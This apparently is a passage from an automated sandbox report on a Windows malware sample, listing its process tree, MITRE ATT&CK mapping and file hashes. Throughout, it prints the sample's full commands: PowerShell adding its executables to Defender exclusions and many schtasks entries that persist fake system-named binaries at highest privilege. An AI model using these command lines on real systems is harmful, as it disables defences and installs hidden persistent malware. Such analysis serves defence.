        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\sppsvc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\winlogon.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\csrss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\lsass.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\fr-FR\taskhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\authman\spoolsv.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\DllCommonsvc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:536
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\I3n8Kat0Z5.bat"
        7⤵
        
        PID:2892
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:2964
        
        C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe
        
        "C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2708
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZAtO29mfgG.bat"
        9⤵
        
        PID:1452
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        10⤵
        
        PID:2676
        
        C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe
        
        "C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2272
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oLfAgN0jmw.bat"
        11⤵
        
        PID:1864
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:2872
        
        C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe
        
        "C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe"
        12⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:704
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\989MOUOnUX.bat"
        13⤵
        
        PID:1380
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        14⤵
        
        PID:2508
        
        C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe
        
        "C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe"
        14⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E3sOpJujjE.bat"
        15⤵
        
        PID:2052
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        16⤵
        
        PID:1928
        
        C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe
        
        "C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe"
        16⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2432
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\83zFD3riGi.bat"
        17⤵
        
        PID:2800
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        18⤵
        
        PID:2272
        
        C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe
        
        "C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe"
        18⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1864
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3EiKDvRnKw.bat"
        19⤵
        
        PID:2816
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        20⤵
        
        PID:1912
        
        C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe
        
        "C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe"
        20⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SsFcJDxdf6.bat"
        21⤵
        
        PID:844
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        22⤵
        
        PID:2972
        
        C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe
        
        "C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe"
        22⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bkUsYtfOrG.bat"
        23⤵
        
        PID:2468
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        24⤵
        
        PID:1876
        
        C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe
        
        "C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe"
        24⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1248
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SNhzeWIHcH.bat"
        25⤵
        
        PID:1600
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        26⤵
        
        PID:2784
        
        C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe
        
        "C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe"
        26⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1644
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9dbjknkRRi.bat"
        27⤵
        
        PID:2376
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        28⤵
        
        PID:2824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\providercommon\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\providercommon\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\providercommon\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Windows\RemotePackages\RemoteApps\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Windows\RemotePackages\RemoteApps\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Program Files\Common Files\Microsoft Shared\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Common Files\Microsoft Shared\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\Microsoft Shared\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows NT\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Media Player\de-DE\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\de-DE\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Media Player\de-DE\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Windows\Setup\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\Setup\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Windows\Setup\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\Cursors\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Cursors\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\Cursors\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\providercommon\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\providercommon\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\providercommon\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Sidebar\fr-FR\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\fr-FR\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\fr-FR\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Windows\Microsoft.NET\authman\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\Microsoft.NET\authman\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Windows\Microsoft.NET\authman\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\DllCommonsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 5 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1268

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dllhost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:1808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dllhost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1907f3e95ce04a3a86fa049faa7dc516

SHA1
7979c4e5055e31404492ea981364918c46614599

SHA256
448b1c74e77dca2038562d7359c2b2e20215d348a8a1aefe167d1dd8d248b846

SHA512
